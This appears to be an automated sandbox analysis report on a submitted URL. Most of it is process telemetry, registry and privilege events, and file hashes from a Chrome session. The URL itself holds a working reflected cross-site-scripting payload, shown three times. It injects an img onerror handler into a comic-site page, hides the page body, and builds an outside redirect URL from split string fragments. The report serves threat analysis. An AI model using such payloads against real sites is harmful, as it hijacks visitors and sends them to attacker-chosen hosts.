Analysis
-
max time kernel
60s -
max time network
65s -
platform
windows10-1703_x64 -
resource
win10-20240611-en -
resource tags
arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system -
submitted
17-06-2024 08:17
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://taiwan-comic-city.taicca.tw/book.php?id=u0cyz"><img src="image.jpg" onerror="window.url1 = ['http://g','oog','le.com','/','#','f'].join(''); document.body.style.display = 'none'; window.url2 = ['http://g','o','og','le.c','om','/','#','f'].join(''); window.url = ['h','t','tp','s',':/','/im','put','ele','tt','er','.c','om/','0/0','/0/ffa','d8a','02','29','8eb1','2354c','a387','b','e36','b26','0e/12/40-12357/1268-5325-19998'].join(''); url = url.replace(/,/g, ''); var win = window.open(url, '_self'); win.opener = null; win.location.replace(url);">
Resource
win10-20240611-en
General
-
Target
https://taiwan-comic-city.taicca.tw/book.php?id=u0cyz"><img src="image.jpg" onerror="window.url1 = ['http://g','oog','le.com','/','#','f'].join(''); document.body.style.display = 'none'; window.url2 = ['http://g','o','og','le.c','om','/','#','f'].join(''); window.url = ['h','t','tp','s',':/','/im','put','ele','tt','er','.c','om/','0/0','/0/ffa','d8a','02','29','8eb1','2354c','a387','b','e36','b26','0e/12/40-12357/1268-5325-19998'].join(''); url = url.replace(/,/g, ''); var win = window.open(url, '_self'); win.opener = null; win.location.replace(url);">
Malware Config
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133630858455601944" chrome.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4472 chrome.exe 4472 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 4472 chrome.exe 4472 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe Token: SeShutdownPrivilege 4472 chrome.exe Token: SeCreatePagefilePrivilege 4472 chrome.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe 4472 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4472 wrote to memory of 804 4472 chrome.exe 71 PID 4472 wrote to memory of 804 4472 chrome.exe 71 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 1956 4472 chrome.exe 73 PID 4472 wrote to memory of 2236 4472 chrome.exe 74 PID 4472 wrote to memory of 2236 4472 chrome.exe 74 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75 PID 4472 wrote to memory of 1896 4472 chrome.exe 75
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://taiwan-comic-city.taicca.tw/book.php?id=u0cyz"><img src="image.jpg" onerror="window.url1 = ['http://g','oog','le.com','/','#','f'].join(''); document.body.style.display = 'none'; window.url2 = ['http://g','o','og','le.c','om','/','#','f'].join(''); window.url = ['h','t','tp','s',':/','/im','put','ele','tt','er','.c','om/','0/0','/0/ffa','d8a','02','29','8eb1','2354c','a387','b','e36','b26','0e/12/40-12357/1268-5325-19998'].join(''); url = url.replace(/,/g, ''); var win = window.open(url, '_self'); win.opener = null; win.location.replace(url);">1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff853bf9758,0x7ff853bf9768,0x7ff853bf97782⤵PID:804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1872,i,16806478483257692805,10141464260681442061,131072 /prefetch:22⤵PID:1956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1804 --field-trial-handle=1872,i,16806478483257692805,10141464260681442061,131072 /prefetch:82⤵PID:2236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2132 --field-trial-handle=1872,i,16806478483257692805,10141464260681442061,131072 /prefetch:82⤵PID:1896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2964 --field-trial-handle=1872,i,16806478483257692805,10141464260681442061,131072 /prefetch:12⤵PID:5068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2976 --field-trial-handle=1872,i,16806478483257692805,10141464260681442061,131072 /prefetch:12⤵PID:1952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4856 --field-trial-handle=1872,i,16806478483257692805,10141464260681442061,131072 /prefetch:82⤵PID:4420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4852 --field-trial-handle=1872,i,16806478483257692805,10141464260681442061,131072 /prefetch:82⤵PID:164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4908 --field-trial-handle=1872,i,16806478483257692805,10141464260681442061,131072 /prefetch:82⤵PID:232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3820 --field-trial-handle=1872,i,16806478483257692805,10141464260681442061,131072 /prefetch:82⤵PID:216
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:2668
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
216B
MD5d43b01237f0016e3b60c3da75836cb44
SHA1345e80f9efa843be7aea6c1c9503b7033548f180
SHA256059f26c399ce05f3ab10e7e14a6ea3f297ceb841acfba7cd1c6dc094dbd6f3d8
SHA512a7404ee4d305905ec3411def9bf633619e1c356fd19c96c507b4200a6f64fc1ffbc189a3062c0213b99ea208f635438ce1cad0ac4ec21c96a705f42e70c35418
-
Filesize
705B
MD5ead74324bd3ec691ed5c9ce276c62c80
SHA1e1695a5c2c6d028f796166712e97ceee6c27dd68
SHA256e42ae2c4b80df5fe70e3d0342cd3a0758261376d203d730d06cbd9a4e26b0cee
SHA512df63544087b7539d92611b1d191eef0267d652f2cf20ac1e07d1b73de11a4ea0ddc68e332a95b89f0682f6364fcc1482c235f6c9e8bcd74ad10287b70b48935e
-
Filesize
5KB
MD5c8743b2f9a14b43f5fd576dfe5d5f7d1
SHA17f4d086579bd38c0c4230fefa7a39a1c04270795
SHA2563801870d6f20acba8274bcb97fdb1aca86912bc6c7944d32e9bbface7183b695
SHA5128f0d1f07f03448d5bbba568c7cbc46b8e759d90e2a416c07a55e5af4835f52f8f984c25ebc02db6a13768d8dc67affe9110a2c025b6bd94e08becbc6078befdf
-
Filesize
5KB
MD52752cef2f054accaf47d7f209656e4f3
SHA1f20d13836a7ff0a229facfd9157a1005f67ae542
SHA256040a2f4fa40d388d8eacb8da65e2e62fc04c40cddfe705dda5401fa78f2cf438
SHA51244bb192445386032f791c2dafeff194f0b08691fbb023ee8d7848d2928bee2a000c417492fa1c725299bfa472b4799d5610df5160575583cf22b394b046c0266
-
Filesize
150KB
MD57c8bec85d9a5e9cfe616d0badcc8889f
SHA159d618d1ac4590fcc841833c16db0fbc0e6a1bd4
SHA2569d03361fbbbbc6d16d42cfdff16be8b856a0b972531ed8e7e45c712f1c53574b
SHA512c5ba459443ff4a31cb4ba0731f574f4c8bbcd405d4e350bbcbff9d4265120d3ff0139dfcc3be8c5a59520789ca30e24e219d813334d15ac7835eb253b769128d
-
Filesize
150KB
MD5097588b636e972f2ceffdeb6920a5eed
SHA1965c6e39df2f0f0328167aee13debb45c50da364
SHA2565c78c401e0bf5d5ae9f2ac68573a234f7996d4c3e911790b995b2effaeeb4a37
SHA512ec4b06eb68bfe27aa7a79512f575af7c5963964853569120c70bef2b5a7cde31e69454419b4beb11d3da9f38b6baa67ac4b426e17355375dcadcfe92821298fa
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd